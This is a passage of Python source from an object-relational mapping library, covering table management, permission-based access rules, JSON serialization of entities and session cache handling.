throw(TableDoesNotExist, 'Table %s does not exist (probably you meant table %s)' % (
provider.format_table_name(table_name),
provider.format_table_name(normalized_table_name)))
throw(TableDoesNotExist, 'Table %s does not exist' % provider.format_table_name(table_name))
if not with_all_data:
for table_name in existed_tables:
if provider.table_has_data(connection, table_name): throw(TableIsNotEmpty,
'Cannot drop table %s because it is not empty. Specify option '
'with_all_data=True if you want to drop table with all data'
% provider.format_table_name(table_name))
for table_name in existed_tables:
if local.debug: log_orm('DROPPING TABLE %s' % provider.format_table_name(table_name))
provider.drop_table(connection, table_name)
@cut_traceback
@db_session(ddl=True)
def create_tables(database, check_tables=False):
cache = database._get_cache()
if database.schema is None: throw(MappingError, 'No mapping was generated for the database')
connection = cache.prepare_connection_for_query_execution()
database.schema.create_tables(database.provider, connection)
if check_tables: database.schema.check_tables(database.provider, connection)
@cut_traceback
@db_session()
def check_tables(database):
cache = database._get_cache()
if database.schema is None: throw(MappingError, 'No mapping was generated for the database')
connection = cache.prepare_connection_for_query_execution()
database.schema.check_tables(database.provider, connection)
@contextmanager
def set_perms_for(database, *entities):
if not entities: throw(TypeError, 'You should specify at least one positional argument')
entity_set = set(entities)
for entity in entities:
if not isinstance(entity, EntityMeta):
throw(TypeError, 'Entity class expected. Got: %s' % entity)
entity_set.update(entity._subclasses_)
if local.perms_context is not None:
throw(OrmError, "'set_perms_for' context manager calls cannot be nested")
local.perms_context = database, entity_set
try: yield
finally:
assert local.perms_context and local.perms_context[0] is database
local.perms_context = None
def _get_schema_dict(database):
result = []
user = get_current_user()
for entity in sorted(database.entities.values(), key=attrgetter('_id_')):
if not can_view(user, entity): continue
attrs = []
for attr in entity._new_attrs_:
if not can_view(user, attr): continue
d = dict(name=attr.name, type=attr.py_type.__name__, kind=attr.__class__.__name__)
if attr.auto: d['auto'] = True
if attr.reverse:
if not can_view(user, attr.reverse.entity): continue
if not can_view(user, attr.reverse): continue
d['reverse'] = attr.reverse.name
if attr.lazy: d['lazy'] = True
if attr.nullable: d['nullable'] = True
if attr.default and issubclass(type(attr.default), (int_types, basestring)):
d['defaultValue'] = attr.default
attrs.append(d)
d = dict(name=entity.__name__, newAttrs=attrs, pkAttrs=[ attr.name for attr in entity._pk_attrs_ ])
if entity._all_bases_:
d['bases'] = [ base.__name__ for base in entity._all_bases_ ]
if entity._simple_keys_:
d['simpleKeys'] = [ attr.name for attr in entity._simple_keys_ ]
if entity._composite_keys_:
d['compositeKeys'] = [ [ attr.name for attr in attrs ] for attrs in entity._composite_keys_ ]
result.append(d)
return result
def _get_schema_json(database):
schema_json = json.dumps(database._get_schema_dict(), default=basic_converter, sort_keys=True)
schema_hash = md5(schema_json.encode('utf-8')).hexdigest()
return schema_json, schema_hash
@cut_traceback
def to_json(database, data, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
for attrs, param_name in ((include, 'include'), (exclude, 'exclude')):
for attr in attrs:
if not isinstance(attr, Attribute): throw(TypeError,
"Each item of '%s' list should be attribute. Got: %s" % (param_name, attr))
include, exclude = set(include), set(exclude)
if converter is None: converter = basic_converter
user = get_current_user()
def user_has_no_rights_to_see(obj, attr=None):
user_groups = get_user_groups(user)
throw(PermissionError, 'The current user %s which belongs to groups %s '
'has no rights to see the object %s on the frontend'
% (user, sorted(user_groups), obj))
object_set = set()
caches = set()
def obj_converter(obj):
if not isinstance(obj, Entity): return converter(obj)
cache = obj._session_cache_
if cache is not None: caches.add(cache)
if len(caches) > 1: throw(TransactionError,
'An attempt to serialize objects belonging to different transactions')
if not can_view(user, obj):
user_has_no_rights_to_see(obj)
object_set.add(obj)
pkval = obj._get_raw_pkval_()
if len(pkval) == 1: pkval = pkval[0]
return { 'class': obj.__class__.__name__, 'pk': pkval }
data_json = json.dumps(data, default=obj_converter)
objects = {}
if caches:
cache = caches.pop()
if cache.database is not database:
throw(TransactionError, 'An object does not belong to specified database')
object_list = list(object_set)
objects = {}
for obj in object_list:
if obj in cache.seeds[obj._pk_attrs_]: obj._load_()
entity = obj.__class__
if not can_view(user, obj):
user_has_no_rights_to_see(obj)
d = objects.setdefault(entity.__name__, {})
for val in obj._get_raw_pkval_(): d = d.setdefault(val, {})
assert not d, d
for attr in obj._attrs_:
if attr in exclude: continue
if attr in include: pass
# if attr not in entity_perms.can_read: user_has_no_rights_to_see(obj, attr)
elif attr.is_collection: continue
elif attr.lazy: continue
# elif attr not in entity_perms.can_read: continue
if attr.is_collection:
if not isinstance(attr, Set): throw(NotImplementedError)
value = []
for item in attr.__get__(obj):
if item not in object_set:
object_set.add(item)
object_list.append(item)
pkval = item._get_raw_pkval_()
value.append(pkval[0] if len(pkval) == 1 else pkval)
value.sort()
else:
value = attr.__get__(obj)
if value is not None and attr.is_relation:
if attr in include and value not in object_set:
object_set.add(value)
object_list.append(value)
pkval = value._get_raw_pkval_()
value = pkval[0] if len(pkval) == 1 else pkval
d[attr.name] = value
objects_json = json.dumps(objects, default=converter)
if not with_schema:
return '{"data": %s, "objects": %s}' % (data_json, objects_json)
schema_json, new_schema_hash = database._get_schema_json()
if schema_hash is not None and schema_hash == new_schema_hash:
return '{"data": %s, "objects": %s, "schema_hash": "%s"}' \
% (data_json, objects_json, new_schema_hash)
return '{"data": %s, "objects": %s, "schema": %s, "schema_hash": "%s"}' \
% (data_json, objects_json, schema_json, new_schema_hash)
@cut_traceback
@db_session
def from_json(database, changes, observer=None):
changes = json.loads(changes)
import pprint; pprint.pprint(changes)
objmap = {}
for diff in changes['objects']:
if diff['_status_'] == 'c': continue
pk = diff['_pk_']
pk = (pk,) if type(pk) is not list else tuple(pk)
entity_name = diff['class']
entity = database.entities[entity_name]
obj = entity._get_by_raw_pkval_(pk, from_db=False)
oid = diff['_id_']
objmap[oid] = obj
def id2obj(attr, val):
return objmap[val] if attr.reverse and val is not None else val
user = get_current_user()
def user_has_no_rights_to(operation, x):
user_groups = get_user_groups(user)
s = 'attribute %s' % x if isinstance(x, Attribute) else 'object %s' % x
throw(PermissionError, 'The current user %s which belongs to groups %s '
'has no rights to %s the %s on the frontend'
% (user, sorted(user_groups), operation, s))
for diff in changes['objects']:
entity_name = diff['class']
entity = database.entities[entity_name]
oldvals = {}
newvals = {}
oldadict = {}
newadict = {}
for name, val in diff.items():
if name not in ('class', '_pk_', '_id_', '_status_'):
attr = entity._adict_[name]
if not attr.is_collection:
if type(val) is dict:
if 'old' in val: oldvals[attr.name] = oldadict[attr] = attr.validate(id2obj(attr, val['old']))
if 'new' in val: newvals[attr.name] = newadict[attr] = attr.validate(id2obj(attr, val['new']))
else: newvals[attr.name] = newadict[attr] = attr.validate(id2obj(attr, val))
oid = diff['_id_']
status = diff['_status_']
if status == 'c':
assert not oldvals
for attr in newadict:
if not can_create(user, attr): user_has_no_rights_to('initialize', attr)
obj = entity(**newvals)
if observer:
flush() # in order to get obj.id
observer('create', obj, newvals)
objmap[oid] = obj
if not can_edit(user, obj): user_has_no_rights_to('create', obj)
else:
obj = objmap[oid]
if status == 'd':
if not can_delete(user, obj): user_has_no_rights_to('delete', obj)
if observer: observer('delete', obj)
obj.delete()
elif status == 'u':
if not can_edit(user, obj): user_has_no_rights_to('update', obj)
if newvals:
for attr in newadict:
if not can_edit(user, attr): user_has_no_rights_to('edit', attr)
assert oldvals
if observer:
observer('update', obj, newvals, oldvals)
obj._db_set_(oldadict) # oldadict can be modified here
for attr in oldadict: attr.__get__(obj)
obj.set(**newvals)
else: assert not oldvals
objmap[oid] = obj
flush()
for diff in changes['objects']:
if diff['_status_'] == 'd': continue
obj = objmap[diff['_id_']]
entity = obj.__class__
for name, val in diff.items():
if name not in ('class', '_pk_', '_id_', '_status_'):
attr = entity._adict_[name]
if attr.is_collection and attr.reverse.is_collection and attr < attr.reverse:
removed = [ objmap[oid] for oid in val.get('removed', ()) ]
added = [ objmap[oid] for oid in val.get('added', ()) ]
if (added or removed) and not can_edit(user, attr): user_has_no_rights_to('edit', attr)
collection = attr.__get__(obj)
if removed:
observer('remove', obj, {name: removed})
collection.remove(removed)
if added:
observer('add', obj, {name: added})
collection.add(added)
flush()
def deserialize(x):
t = type(x)
if t is list: return list(imap(deserialize, x))
if t is dict:
if '_id_' not in x:
return {key: deserialize(val) for key, val in iteritems(x)}
obj = objmap.get(x['_id_'])
if obj is None:
entity_name = x['class']
entity = database.entities[entity_name]
pk = x['_pk_']
obj = entity[pk]
return obj
return x
return deserialize(changes['data'])
def basic_converter(x):
if isinstance(x, (datetime.datetime, datetime.date, Decimal)):
return str(x)
if isinstance(x, dict):
return dict(x)
if isinstance(x, Entity):
pkval = x._get_raw_pkval_()
return pkval[0] if len(pkval) == 1 else pkval
if hasattr(x, '__iter__'): return list(x)
throw(TypeError, 'The following object cannot be converted to JSON: %r' % x)
@cut_traceback
def perm(*args, **kwargs):
if local.perms_context is None:
throw(OrmError, "'perm' function can be called within 'set_perm_for' context manager only")
database, entities = local.perms_context
permissions = _split_names('Permission', args)
groups = pop_names_from_kwargs('Group', kwargs, 'group', 'groups')
roles = pop_names_from_kwargs('Role', kwargs, 'role', 'roles')
labels = pop_names_from_kwargs('Label', kwargs, 'label', 'labels')
for kwname in kwargs: throw(TypeError, 'Unknown keyword argument name: %s' % kwname)
return AccessRule(database, entities, permissions, groups, roles, labels)
def _split_names(typename, names):
if names is None: return set()
if isinstance(names, basestring):
names = names.replace(',', ' ').split()
else:
try: namelist = list(names)
except: throw(TypeError, '%s name should be string. Got: %s' % (typename, names))
names = []
for name in namelist:
names.extend(_split_names(typename, name))
for name in names:
if not is_ident(name): throw(TypeError, '%s name should be identifier. Got: %s' % (typename, name))
return set(names)
def pop_names_from_kwargs(typename, kwargs, *kwnames):
result = set()
for kwname in kwnames:
kwarg = kwargs.pop(kwname, None)
if kwarg is not None: result.update(_split_names(typename, kwarg))
return result
class AccessRule(object):
def __init__(rule, database, entities, permissions, groups, roles, labels):
rule.database = database
rule.entities = entities
if not permissions: throw(TypeError, 'At least one permission should be specified')
rule.permissions = permissions
rule.groups = groups
rule.groups.add('anybody')
rule.roles = roles
rule.labels = labels
rule.entities_to_exclude = set()
rule.attrs_to_exclude = set()
for entity in entities:
for perm in rule.permissions:
entity._access_rules_[perm].add(rule)
def exclude(rule, *args):
for arg in args:
if isinstance(arg, EntityMeta):
entity = arg
rule.entities_to_exclude.add(entity)
rule.entities_to_exclude.update(entity._subclasses_)
elif isinstance(arg, Attribute):
attr = arg
if attr.pk_offset is not None: throw(TypeError, 'Primary key attribute %s cannot be excluded' % attr)
rule.attrs_to_exclude.add(attr)
else: throw(TypeError, 'Entity or attribute expected. Got: %r' % arg)
@cut_traceback
def has_perm(user, perm, x):
if isinstance(x, EntityMeta):
entity = x
elif isinstance(x, Entity):
entity = x.__class__
elif isinstance(x, Attribute):
if x.hidden: return False
entity = x.entity
else: throw(TypeError, "The third parameter of 'has_perm' function should be entity class, entity instance "
"or attribute. Got: %r" % x)
access_rules = entity._access_rules_.get(perm)
if not access_rules: return False
cache = entity._database_._get_cache()
perm_cache = cache.perm_cache[user][perm]
result = perm_cache.get(x)
if result is not None: return result
user_groups = get_user_groups(user)
result = False
if isinstance(x, EntityMeta):
for rule in access_rules:
if user_groups.issuperset(rule.groups) and entity not in rule.entities_to_exclude:
result = True
break
elif isinstance(x, Attribute):
attr = x
for rule in access_rules:
if user_groups.issuperset(rule.groups) and entity not in rule.entities_to_exclude \
and attr not in rule.attrs_to_exclude:
result = True
break
reverse = attr.reverse
if reverse:
reverse_rules = reverse.entity._access_rules_.get(perm)
if not reverse_rules: return False
for reverse_rule in access_rules:
if user_groups.issuperset(reverse_rule.groups) \
and reverse.entity not in reverse_rule.entities_to_exclude \
and reverse not in reverse_rule.attrs_to_exclude:
result = True
break
if result: break
else:
obj = x
user_roles = get_user_roles(user, obj)
obj_labels = get_object_labels(obj)
for rule in access_rules:
if x in rule.entities_to_exclude: continue
elif not user_groups.issuperset(rule.groups): pass
elif not user_roles.issuperset(rule.roles): pass
elif not obj_labels.issuperset(rule.labels): pass
else:
result = True
break
perm_cache[perm] = result
return result
def can_view(user, x):
return has_perm(user, 'view', x) or has_perm(user, 'edit', x)
def can_edit(user, x):
return has_perm(user, 'edit', x)
def can_create(user, x):
return has_perm(user, 'create', x)
def can_delete(user, x):
return has_perm(user, 'delete', x)
def get_current_user():
return local.current_user
def set_current_user(user):
local.current_user = user
anybody_frozenset = frozenset(['anybody'])
def get_user_groups(user):
result = local.user_groups_cache.get(user)
if result is not None: return result
if user is None: return anybody_frozenset
result = {'anybody'}
for cls, func in usergroup_functions:
if cls is None or isinstance(user, cls):
groups = func(user)
if isinstance(groups, basestring): # single group name
result.add(groups)
elif groups is not None:
result.update(groups)
result = frozenset(result)
local.user_groups_cache[user] = result
return result
def get_user_roles(user, obj):
if user is None: return frozenset()
roles_cache = local.user_roles_cache[user]
result = roles_cache.get(obj)
if result is not None: return result
result = set()
if user is obj: result.add('self')
for user_cls, obj_cls, func in userrole_functions:
if user_cls is None or isinstance(user, user_cls):
if obj_cls is None or isinstance(obj, obj_cls):
roles = func(user, obj)
if isinstance(roles, basestring): # single role name
result.add(roles)
elif roles is not None:
result.update(roles)
result = frozenset(result)
roles_cache[obj] = result
return result
def get_object_labels(obj):
cache = obj._database_._get_cache()
obj_labels_cache = cache.obj_labels_cache
result = obj_labels_cache.get(obj)
if result is None:
result = set()
for obj_cls, func in objlabel_functions:
if obj_cls is None or isinstance(obj, obj_cls):
labels = func(obj)
if isinstance(labels, basestring): # single label name
result.add(labels)
elif labels is not None:
result.update(labels)
obj_labels_cache[obj] = result
return result
usergroup_functions = []
def user_groups_getter(cls=None):
def decorator(func):
if func not in usergroup_functions:
usergroup_functions.append((cls, func))
return func
return decorator
userrole_functions = []
def user_roles_getter(user_cls=None, obj_cls=None):
def decorator(func):
if func not in userrole_functions:
userrole_functions.append((user_cls, obj_cls, func))
return func
return decorator
objlabel_functions = []
def obj_labels_getter(cls=None):
def decorator(func):
if func not in objlabel_functions:
objlabel_functions.append((cls, func))
return func
return decorator
class DbLocal(localbase):
def __init__(dblocal):
dblocal.stats = {}
dblocal.last_sql = None
class QueryStat(object):
def __init__(stat, sql, query_start_time=None):
if query_start_time is not None:
query_end_time = time()
duration = query_end_time - query_start_time
stat.min_time = stat.max_time = stat.sum_time = duration
stat.db_count = 1
stat.cache_count = 0
else:
stat.min_time = stat.max_time = stat.sum_time = None
stat.db_count = 0
stat.cache_count = 1
stat.sql = sql
def copy(stat):
result = object.__new__(QueryStat)
result.__dict__.update(stat.__dict__)
return result
def query_executed(stat, query_start_time):
query_end_time = time()
duration = query_end_time - query_start_time
if stat.db_count:
stat.min_time = builtins.min(stat.min_time, duration)
stat.max_time = builtins.max(stat.max_time, duration)
stat.sum_time += duration
else: stat.min_time = stat.max_time = stat.sum_time = duration
stat.db_count += 1
def merge(stat, stat2):
assert stat.sql == stat2.sql
if not stat2.db_count: pass
elif stat.db_count:
stat.min_time = builtins.min(stat.min_time, stat2.min_time)
stat.max_time = builtins.max(stat.max_time, stat2.max_time)
stat.sum_time += stat2.sum_time
else:
stat.min_time = stat2.min_time
stat.max_time = stat2.max_time
stat.sum_time = stat2.sum_time
stat.db_count += stat2.db_count
stat.cache_count += stat2.cache_count
@property
def avg_time(stat):
if not stat.db_count: return None
return stat.sum_time / stat.db_count
num_counter = itertools.count()
class SessionCache(object):
def __init__(cache, database):
cache.is_alive = True
cache.num = next(num_counter)
cache.database = database
cache.objects = set()
cache.indexes = defaultdict(dict)
cache.seeds = defaultdict(set)
cache.max_id_cache = {}
cache.collection_statistics = {}
cache.for_update = set()
cache.noflush_counter = 0
cache.modified_collections = defaultdict(set)
cache.objects_to_save = []
cache.saved_objects = []
cache.query_results = {}
cache.modified = False
cache.db_session = db_session = local.db_session
cache.immediate = db_session is not None and db_session.immediate
cache.connection = None
cache.in_transaction = False
cache.saved_fk_state = None
cache.perm_cache = defaultdict(lambda : defaultdict(dict)) # user -> perm -> cls_or_attr_or_obj -> bool
cache.user_roles_cache = defaultdict(dict) # user -> obj -> roles
cache.obj_labels_cache = {} # obj -> labels
def connect(cache):
assert cache.connection is None
if cache.in_transaction: throw(ConnectionClosedError,
'Transaction cannot be continued because database connection failed')
database = cache.database
provider = database.provider
connection, is_new_connection = provider.connect()
if is_new_connection:
database.call_on_connect(connection)
try:
provider.set_transaction_mode(connection, cache) # can set cache.in_transaction
except:
provider.drop(connection, cache)
raise
cache.connection = connection
return connection
def reconnect(cache, exc):
provider = cache.database.provider
if exc is not None:
exc = getattr(exc, 'original_exc', exc)
if not provider.should_reconnect(exc): reraise(*sys.exc_info())
if local.debug: log_orm('CONNECTION FAILED: %s' % exc)
connection = cache.connection
assert connection is not None
cache.connection = None
provider.drop(connection, cache)
else: assert cache.connection is None
return cache.connect()
def prepare_connection_for_query_execution(cache):
db_session = local.db_session
if db_session is not None and cache.db_session is None:
# This situation can arise when a transaction was started
# in the interactive mode, outside of the db_session
if cache.in_transaction or cache.modified:
local.db_session = None
try: cache.flush_and_commit()
finally: local.db_session = db_session
cache.db_session = db_session
cache.immediate = cache.immediate or db_session.immediate
else: assert cache.db_session is db_session, (cache.db_session, db_session)
connection = cache.connection
if connection is None: connection = cache.connect()
elif cache.immediate and not cache.in_transaction:
provider = cache.database.provider
try: provider.set_transaction_mode(connection, cache) # can set cache.in_transaction
except Exception as e: connection = cache.reconnect(e)
if not cache.noflush_counter and cache.modified: cache.flush()
return connection
def flush_and_commit(cache):
try: cache.flush()
except:
cache.rollback()
raise
try: cache.commit()
except: transact_reraise(CommitException, [sys.exc_info()])
def commit(cache):
assert cache.is_alive
try:
if cache.modified: cache.flush()
if cache.in_transaction:
assert cache.connection is not None
cache.database.provider.commit(cache.connection, cache)
cache.for_update.clear()
cache.query_results.clear()
cache.max_id_cache.clear()
cache.immediate = True
except:
cache.rollback()
raise
def rollback(cache):
cache.close(rollback=True)
def release(cache):
cache.close(rollback=False)
def close(cache, rollback=True):
assert cache.is_alive
if not rollback: assert not cache.in_transaction
database = cache.database
x = local.db2cache.pop(database); assert x is cache
cache.is_alive = False
provider = database.provider
connection = cache.connection
if connection is None: return
cache.connection = None
try:
if rollback:
try: provider.rollback(connection, cache)
except:
provider.drop(connection, cache)
raise
provider.release(connection, cache)
finally:
db_session = cache.db_session or local.db_session
if db_session:
if db_session.strict:
for obj in cache.objects:
obj._vals_ = obj._dbvals_ = obj._session_cache_ = None
cache.perm_cache = cache.user_roles_cache = cache.obj_labels_cache = None
else:
for obj in cache.objects:
obj._dbvals_ = obj._session_cache_ = None
for attr, setdata in iteritems(obj._vals_):
if attr.is_collection:
if not setdata.is_fully_loaded: obj._vals_[attr] = None
cache.objects = cache.objects_to_save = cache.saved_objects = cache.query_results \
= cache.indexes = cache.seeds = cache.for_update = cache.max_id_cache \
= cache.modified_collections = cache.collection_statistics = None
@contextmanager
def flush_disabled(cache):
cache.noflush_counter += 1
try: yield
finally: cache.noflush_counter -= 1
def flush(cache):
if cache.noflush_counter: return
assert cache.is_alive
assert not cache.saved_objects
if not cache.immediate: cache.immediate = True
for i in xrange(50):
if not cache.modified: return
with cache.flush_disabled():
for obj in cache.objects_to_save: # can grow during iteration
if obj is not None: obj._before_save_()
cache.query_results.clear()
modified_m2m = cache._calc_modified_m2m()
for attr, (added, removed) in iteritems(modified_m2m):
if not removed: continue
attr.remove_m2m(removed)
for obj in cache.objects_to_save:
if obj is not None: obj._save_()
for attr, (added, removed) in iteritems(modified_m2m):
if not added: continue
attr.add_m2m(added)
cache.max_id_cache.clear()
cache.modified_collections.clear()
cache.objects_to_save[:] = ()
cache.modified = False
cache.call_after_save_hooks()
else:
if cache.modified: throw(TransactionError,
'Recursion depth limit reached in obj._after_save_() call')
def call_after_save_hooks(cache):
saved_objects = cache.saved_objects
cache.saved_objects = []
for obj, status in saved_objects:
obj._after_save_(status)
def _calc_modified_m2m(cache):
modified_m2m = {}
for attr, objects in sorted(iteritems(cache.modified_collections),
key=lambda pair: (pair[0].entity.__name__, pair[0].name)):
if not isinstance(attr, Set): throw(NotImplementedError)
reverse = attr.reverse
if not reverse.is_collection:
for obj in objects:
setdata = obj._vals_[attr]
setdata.added = setdata.removed = setdata.absent = None
continue
if not isinstance(reverse, Set): throw(NotImplementedError)
if reverse in modified_m2m: continue
added, removed = modified_m2m.setdefault(attr, (set(), set()))
for obj in objects:
setdata = obj._vals_[attr]
if setdata.added:
for obj2 in setdata.added: added.add((obj, obj2))
if setdata.removed:
for obj2 in setdata.removed: removed.add((obj, obj2))
if obj._status_ == 'marked_to_delete': del obj._vals_[attr]
else: setdata.added = setdata.removed = setdata.absent = None
cache.modified_collections.clear()
return modified_m2m
def update_simple_index(cache, obj, attr, old_val, new_val, undo):
assert old_val != new_val
cache_index = cache.indexes[attr]
if new_val is not None:
obj2 = cache_index.setdefault(new_val, obj)
if obj2 is not obj: throw(CacheIndexError, 'Cannot update %s.%s: %s with key %s already exists'
% (obj.__class__.__name__, attr.name, obj2, new_val))
if old_val is not None: del cache_index[old_val]
undo.append((cache_index, old_val, new_val))
def db_update_simple_index(cache, obj, attr, old_dbval, new_dbval):
assert old_dbval != new_dbval
cache_index = cache.indexes[attr]
if new_dbval is not None:
obj2 = cache_index.setdefault(new_dbval, obj)
if obj2 is not obj: throw(TransactionIntegrityError,
'%s with unique index %s.%s already exists: %s'
% (obj2.__class__.__name__, obj.__class__.__name__, attr.name, new_dbval))
# attribute which was created or updated lately clashes with one stored in database
cache_index.pop(old_dbval, None)
def update_composite_index(cache, obj, attrs, prev_vals, new_vals, undo):
assert prev_vals != new_vals
if None in prev_vals: prev_vals = None
if None in new_vals: new_vals = None
if prev_vals is None and new_vals is None: return
cache_index = cache.indexes[attrs]
if new_vals is not None:
obj2 = cache_index.setdefault(new_vals, obj)
if obj2 is not obj:
attr_names = ', '.join(attr.name for attr in attrs)
throw(CacheIndexError, 'Cannot update %r: composite key (%s) with value %s already exists for %r'
% (obj, attr_names, new_vals, obj2))
if prev_vals is not None: del cache_index[prev_vals]
undo.append((cache_index, prev_vals, new_vals))
def db_update_composite_index(cache, obj, attrs, prev_vals, new_vals):
assert prev_vals != new_vals
cache_index = cache.indexes[attrs]
if None not in new_vals:
obj2 = cache_index.setdefault(new_vals, obj)
if obj2 is not obj:
key_str = ', '.join(repr(item) for item in new_vals)
throw(TransactionIntegrityError, '%s with unique index (%s) already exists: %s'
% (obj2.__class__.__name__, ', '.join(attr.name for attr in attrs), key_str))
cache_index.pop(prev_vals, None)
class NotLoadedValueType(object):
def __repr__(self): return 'NOT_LOADED'
NOT_LOADED = NotLoadedValueType()
class DefaultValueType(object):
def __repr__(self): return 'DEFAULT'
DEFAULT = DefaultValueType()
class DescWrapper(object):
def __init__(self, attr):
self.attr = attr
def __repr__(self):
return '<DescWrapper(%s)>' % self.attr
def __call__(self):
return self
def __eq__(self, other):
return type(other) is DescWrapper and self.attr == other.attr
def __ne__(self, other):
return type(other) is not DescWrapper or self.attr != other.attr
def __hash__(self):
return hash(self.attr) + 1
attr_id_counter = itertools.count(1)
class Attribute(object):
__slots__ = 'nullable', 'is_required', 'is_discriminator', 'is_unique', 'is_part_of_unique_index', \
'is_pk', 'is_collection', 'is_relation', 'is_basic', 'is_string', 'is_volatile', 'is_implicit', \
'id', 'pk_offset', 'pk_columns_offset', 'py_type', 'sql_type', 'entity', 'name', \
'lazy', 'lazy_sql_cache', 'args', 'auto', 'default', 'reverse', 'composite_keys', \
'column', 'columns', 'col_paths', '_columns_checked', 'converters', 'kwargs', \
'cascade_delete', 'index', 'original_default', 'sql_default', 'py_check', 'hidden', \
'optimistic', 'fk_name'
def __deepcopy__(attr, memo):
return attr # Attribute cannot be cloned by deepcopy()
@cut_traceback
def __init__(attr, py_type, *args, **kwargs):
if attr.__class__ is Attribute: throw(TypeError, "'Attribute' is abstract type")
attr.is_implicit = False
attr.is_required = isinstance(attr, Required)
attr.is_discriminator = isinstance(attr, Discriminator)
attr.is_unique = kwargs.pop('unique', None)
if isinstance(attr, PrimaryKey):
if attr.is_unique is not None:
throw(TypeError, "'unique' option cannot be set for PrimaryKey attribute ")
attr.is_unique = True
attr.nullable = kwargs.pop('nullable', None)
attr.is_part_of_unique_index = attr.is_unique # Also can be set to True later
attr.is_pk = isinstance(attr, PrimaryKey)
if attr.is_pk: attr.pk_offset = 0
else: attr.pk_offset = None
attr.id = next(attr_id_counter)
if not isinstance(py_type, (type, basestring, types.FunctionType)):
if py_type is datetime: throw(TypeError,
'datetime is the module and cannot be used as attribute type. Use datetime.datetime instead')
throw(TypeError, 'Incorrect type of attribute: %r' % py_type)
attr.py_type = py_type
attr.is_string = type(py_type) is type and issubclass(py_type, basestring)
attr.is_collection = isinstance(attr, Collection)
attr.is_relation = isinstance(attr.py_type, (EntityMeta, basestring, types.FunctionType))
attr.is_basic = not attr.is_collection and not attr.is_relation
attr.sql_type = kwargs.pop('sql_type', None)
attr.entity = attr.name = None
attr.args = args
attr.auto = kwargs.pop('auto', False)
attr.cascade_delete = kwargs.pop('cascade_delete', None)
attr.reverse = kwargs.pop('reverse', None)
if not attr.reverse: pass
elif not isinstance(attr.reverse, (basestring, Attribute)):
throw(TypeError, "Value of 'reverse' option must be name of reverse attribute). Got: %r" % attr.reverse)
elif not attr.is_relation:
throw(TypeError, 'Reverse option cannot be set for this type: %r' % attr.py_type)
attr.column = kwargs.pop('column', None)
attr.columns = kwargs.pop('columns', None)
if attr.column is not None:
if attr.columns is not None:
throw(TypeError, "Parameters 'column' and 'columns' cannot be specified simultaneously")
if not isinstance(attr.column, basestring):
throw(TypeError, "Parameter 'column' must be a string. Got: %r" % attr.column)
attr.columns = [ attr.column ]
elif attr.columns is not None:
if not isinstance(attr.columns, (tuple, list)):
throw(TypeError, "Parameter 'columns' must be a list. Got: %r'" % attr.columns)
for column in attr.columns:
if not isinstance(column, basestring):
throw(TypeError, "Items of parameter 'columns' must be strings. Got: %r" % attr.columns)
if len(attr.columns) == 1: attr.column = attr.columns[0]
else: attr.columns = []
attr.index = kwargs.pop('index', None)
attr.fk_name = kwargs.pop('fk_name', None)
attr.col_paths = []
attr._columns_checked = False
attr.composite_keys = []
attr.lazy = kwargs.pop('lazy', getattr(py_type, 'lazy', False))
attr.lazy_sql_cache = None
attr.is_volatile = kwargs.pop('volatile', False)
attr.optimistic = kwargs.pop('optimistic', None)
attr.sql_default = kwargs.pop('sql_default', None)
attr.py_check = kwargs.pop('py_check', None)
attr.hidden = kwargs.pop('hidden', False)
attr.kwargs = kwargs
attr.converters = []
def _init_(attr, entity, name):
attr.entity = entity
attr.name = name
if attr.pk_offset is not None and attr.lazy:
throw(TypeError, 'Primary key attribute %s cannot be lazy' % attr)
if attr.cascade_delete is not None and attr.is_basic:
throw(TypeError, "'cascade_delete' option cannot be set for attribute %s, "
"because it is not relationship attribute" % attr)
if not attr.is_required:
if attr.is_unique and attr.nullable is False:
throw(TypeError, 'Optional unique attribute %s must be nullable' % attr)
if entity._root_ is not entity:
if attr.nullable is False: throw(ERDiagramError,
'Attribute %s must be nullable due to single-table inheritance' % attr)
attr.nullable = True
if 'default' in attr.kwargs:
attr.default = attr.original_default = attr.kwargs.pop('default')
if attr.is_required:
if attr.default is None: throw(TypeError,
'Default value for required attribute %s cannot be None' % attr)
if attr.default == '': throw(TypeError,
'Default value for required attribute %s cannot be empty string' % attr)
elif attr.default is None and not attr.nullable: throw(TypeError,
'Default value for non-nullable attribute %s cannot be set to None' % attr)
elif attr.is_string and not attr.is_required and not attr.nullable:
attr.default = ''
else:
attr.default = None
sql_default = attr.sql_default
if isinstance(sql_default, basestring):
if sql_default == '': throw(TypeError,
"'sql_default' option value cannot be empty string, "
"because it should be valid SQL literal or expression. "
"Try to use \"''\", or just specify default='' instead.")
elif attr.sql_default not in (None, True, False):
throw(TypeError, "'sql_default' option of %s attribute must be of string or bool type. Got: %s"
% (attr, attr.sql_default))
if attr.py_check is not None and not callable(attr.py_check):
throw(TypeError, "'py_check' parameter of %s attribute should be callable" % attr)
# composite keys will be checked later inside EntityMeta.__init__
if attr.py_type == float:
if attr.is_pk: throw(TypeError, 'PrimaryKey attribute %s cannot be of type float' % attr)
elif attr.is_unique: throw(TypeError, 'Unique attribute %s cannot be of type float' % attr)
if attr.is_volatile and (attr.is_pk or attr.is_collection): throw(TypeError,
'%s attribute %s cannot be volatile' % (attr.__class__.__name__, attr))
def linked(attr):
reverse = attr.reverse
if attr.cascade_delete is None:
attr.cascade_delete = attr.is_collection and reverse.is_required
elif attr.cascade_delete:
if reverse.cascade_delete: throw(TypeError,
"'cascade_delete' option cannot be set for both sides of relationship "
"(%s and %s) simultaneously" % (attr, reverse))
if reverse.is_collection: throw(TypeError,
"'cascade_delete' option cannot be set for attribute %s, "
"because reverse attribute %s is collection" % (attr, reverse))
if attr.is_collection and not reverse.is_collection:
if attr.fk_name is not None:
throw(TypeError, 'You should specify fk_name in %s instead of %s' % (reverse, attr))
for option in attr.kwargs:
throw(TypeError, 'Attribute %s has unknown option %r' % (attr, option))
@cut_traceback
def __repr__(attr):
owner_name = attr.entity.__name__ if attr.entity else '?'
return '%s.%s' % (owner_name, attr.name or '?')
def __lt__(attr, other):
return attr.id < other.id
def validate(attr, val, obj=None, entity=None, from_db=False):
if val is None:
if not attr.nullable and not from_db and not attr.is_required:
# for required attribute the exception will be thrown later with another message
throw(ValueError, 'Attribute %s cannot be set to None' % attr)
return val
assert val is not NOT_LOADED
if val is DEFAULT:
default = attr.default
if default is None: return None
if callable(default): val = default()
else: val = default
if entity is not None: pass
elif obj is not None: entity = obj.__class__
else: entity = attr.entity
reverse = attr.reverse
if not reverse:
if isinstance(val, Entity): throw(TypeError, 'Attribute %s must be of %s type. Got: %s'
% (attr, attr.py_type.__name__, val))
